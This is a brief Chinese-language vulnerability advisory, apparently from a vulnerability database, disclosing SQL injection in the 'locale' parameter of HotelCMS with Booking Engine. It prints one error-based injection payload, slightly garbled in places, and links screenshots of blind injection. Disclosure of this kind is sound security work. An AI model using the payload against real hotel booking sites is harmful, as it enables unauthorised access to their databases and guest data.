HotelCMS with Booking Engine - SQL 注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

http://localhost/[PATH]/locale?locale=SQL locale参数存在sql注入 其中报错注入如下: payload: [http://localhost/PATH]/locale?locale=1' AND (SELECT 3507 FROM(SELECT COUNT(),CONCAT(FLOOR(RAND(0)2),md5(233))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Lilt 测试截图: ![](https://images.seebug.org/contribute/0db27505-4937-4cdb-a5f0-fa377c0fd8c9) 布尔盲注和时间盲注如下: ![](https://images.seebug.org/contribute/86aed7bf-b172-4bd0-8d9b-cb84605deb41)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息